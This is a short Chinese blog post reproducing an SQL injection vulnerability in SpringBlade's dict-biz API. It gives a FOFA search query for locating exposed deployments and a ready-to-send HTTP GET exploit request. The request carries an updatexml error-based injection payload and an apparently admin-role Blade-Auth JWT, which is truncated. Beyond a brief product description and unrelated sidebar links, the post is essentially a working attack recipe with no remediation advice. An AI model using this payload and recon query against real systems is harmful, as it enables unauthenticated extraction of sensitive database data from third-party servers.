【漏洞复现】SpringBlade dict-biz SQL注入漏洞

0x01 产品简介

SpringBlade 是一个由商业级项目升级优化而来的微服务架构 采用Spring Boot 2.7 、Spring Cloud 2021 等核心技术构建,完全遵循阿里巴巴编码规范。提供基于React和Vue的两个前端框架用于快速搭建企业级的SaaS多租户微服务平台。

0x02 漏洞概述

SpringBlade dict-biz接口存在SQL注入漏洞。未经身份验证的攻击者可以利用此漏洞获取数据库敏感信息。

0x03 测绘语句

​
fofa: body="https://bladex.vip" || body="Saber 将不能正常工作"

​

0x04 漏洞复现

GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,md5(1),0x7e),1)=1 HTTP/1.1

Host:

Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVw

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-04-26 07:36:04       98 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-04-26 07:36:04       106 阅读
  3. 在Django里面运行非项目文件

    2024-04-26 07:36:04       87 阅读
  4. Python语言-面向对象

    2024-04-26 07:36:04       96 阅读

热门阅读

  1. Ribbon饥饿模式

    2024-04-26 07:36:04       27 阅读
  2. c语言里的位域

    2024-04-26 07:36:04       27 阅读
  3. 【C语言】typedef

    2024-04-26 07:36:04       31 阅读
  4. golang上传文件到ftp服务器

    2024-04-26 07:36:04       45 阅读
  5. 【计算机系统】

    2024-04-26 07:36:04       28 阅读
  6. 前端网络---网络安全

    2024-04-26 07:36:04       33 阅读
  7. Swift中TableView的编辑模式

    2024-04-26 07:36:04       31 阅读
  8. 稳扎稳打进入科研方向的三个阶段

    2024-04-26 07:36:04       38 阅读